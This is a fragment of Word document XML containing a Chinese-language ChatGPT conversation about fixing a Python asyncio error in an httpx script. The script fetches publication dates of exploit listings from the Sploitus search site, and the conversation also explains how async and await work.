        <w:t>10*x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。你需要确保你传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> querySploitus() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的是一个有效的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39371C48" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244D0D3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我更改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async def querySploitus(url, data_offset=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750BD9E2" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B2ABE2" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        response = await client.post(url=url, json={"type": "exploits", "sort": "date", "query": "cve", "title": False, "offset": data_offset}, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B78F5CF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_json = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7AF7F0" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A86A834" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        exps = res_json["exploits"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF8996" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for single_exp in exps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E3043" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if single_exp.get("published")!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E3C0D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                single_exp_date = single_exp.get("published")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4322A407" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                res_list.append(single_exp_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FB8134" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(res_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25986782" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C7A1DE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F99B1F8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664D3548" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># asyncio.run(querySploitus(url))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B020238" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.run(asyncio.gather(*task_list))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ValueError: a coroutine was expected, got &lt;_GatheringFuture pending&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BE9DF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E7ED72" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308D1BA9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抱歉给你带来了困扰。这个问题的原因是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather(*task_list) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的是一个协程对象，你需要在一个异步函数中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个结果。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.run() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只接受一个协程对象，但不能直接接受一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> gather </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306AF5CA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12642698" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather(*task_list) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放在另一个异步函数里面，然后运行这个函数，就像下面这样：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27295163" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77241755" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA005F3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C110EAD" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus(url, data_offset=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556CBCB1" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478FB4D5" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response = await client.post(url=url, json={"type": "exploits", "sort": "date", "query": "cve", "title": False, "offset": data_offset}, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1923BF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_json = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327D4475" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB80FE7" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        exps = res_json["exploits"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5246CAC3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for single_exp in exps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DD7D60" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if single_exp.get("published")!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1F79E1" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                single_exp_date = single_exp.get("published")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E939ACE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                res_list.append(single_exp_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA6D5FC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(res_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6BF5D8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC33C60" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F03812" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A3D47E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1BCA54" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await asyncio.gather(*task_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612DC95D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3492CE40" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFF4271" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A4D70C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个修复后的代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个异步函数，它调用并等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather(*task_list) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结果。然后，我们使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.run(main()) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDAB3B6" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D2A7B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个字使用本身的意义是什么？他会临时挂起自己执行的异步函数，先去执行后面的代码，等异步函数执行完再回来吗？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的语句结构使用的场景是把大量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句放在一个时间段执行来优化效率的吗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC37098" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C3751A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70701FEA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字用于等待一个异步操作的完成。当你在一个协程中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字，这意味着你要暂停协程的执行，等待一个异步操作的完成。这个异步操作可能是另一个协程，或者是一个返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18853A10" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A113A93" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句时，它不会立即执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面的代码，而是将控制权交回给事件循环。事件循环可以继续执行其他协程，直到被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异步操作完成。一旦这个异步操作完成，事件循环将重新唤醒被暂停的协程，继续执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200ED2D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48978DAC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字主要用于异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程。在现代应用程序中，很多操作都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密集型的，如网络请求、文件读写、数据库查询等。这些操作在等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成时会阻塞线程，使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法进行其他任务。而使用异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程，可以让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作时执行其他任务，从而提高程序的效率和响应性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7922CD68" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472F0B63" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，假设你有一个网络服务器，需要处理大量的并发请求。如果你使用同步编程，那么对于每个请求，你都需要等待网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成（如接收请求、发送响应）才能处理下一个请求。这样的效率很低，因为在等待网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么也不做。但如果你使用异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程，你可以在等待一个请求的网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时处理其他请求。当一个请求的网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成，你可以立即切换回去处理这个请求。这样，你的服务器可以高效地处理大量并发请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D4B180" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
